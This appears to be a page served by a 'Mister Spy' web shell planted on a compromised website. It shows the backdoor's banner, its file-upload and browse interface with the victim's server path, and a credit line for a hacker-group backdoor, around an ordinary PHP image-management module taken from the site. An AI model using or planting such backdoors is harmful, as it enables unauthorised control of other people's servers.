Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/espanol/modules/
Upload File :
Current File : /home/caballoscriollos/public_html/espanol/modules/eventoimagenes.php

<?
require_once('../library/class.eventoimagenes.php');


class ModuleEventoImagenes extends Module
{
	function GetName()
	{
		return "EventoImagenes";
	}


	function GetXMLCommands()
	{
		$Commands = array();

		$Commands[] = 'GetById';
		$Commands[] = 'GetLastId';
		$Commands[] = 'GetAll';
		$Commands[] = 'Create';
		$Commands[] = 'Update';
		$Commands[] = 'Delete';

		return $Commands;
	}

	
	function GetById(array $array)
	{
		$EventoImagenes = new EventoImagenes();

		return $EventoImagenes->GetById($array['IdImagen']);
	}


	function GetLastId(array $array)
	{
		$EventoImagenes = new EventoImagenes();

		return $EventoImagenes->GetLastId();
	}

	
	function GetAll(array $array)
	{
		$EventoImagenes 	= new EventoImagenes();
		$oPage 				= new Page($array['CurrentPage']);
		
		$filter = array();		
		$filter['Nombre'] = $array['Filter_Nombre'];
		
		return $EventoImagenes->GetAll($filter, $oPage);
	}


	function Create(array $array)
	{
		$EventoImagenes 	= new EventoImagenes();
		$oEventoImagen 	= new EventoImagen();

		$oEventoImagen->IdEvento 	= $array['IdEvento'];
		$oEventoImagen->Imagen 	= $array['Imagen'];
		$oEventoImagen->Epigrafe 	= $array['Epigrafe'];
			
		$oEventoImagen = $EventoImagenes->Create($oEventoImagen);
		if (!$oEventoImagen)
			return false;
		
		return $oEventoImagen;
	}


	function Update(array $array)
	{
		$EventoImagenes = new EventoImagenes();

		/* obtiene los datos del registro */
		$oEventoImagen = $EventoImagenes->GetById($array['IdImagen']);
		if (!$oEventoImagen)
			return false;
		
		$oEventoImagen->Epigrafe = $array['Epigrafe'];
		
		return $EventoImagenes->Update($oEventoImagen);
	}


	function Delete(array $array)
	{
		$EventoImagenes = new EventoImagenes();

		/* obtiene los datos del registro */
		$oEventoImagen = $EventoImagenes->GetById($array['IdImagen']);
		if (!$oEventoImagen)
			return false;
		
		return $EventoImagenes->Delete($oEventoImagen->IdImagen);
	}
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat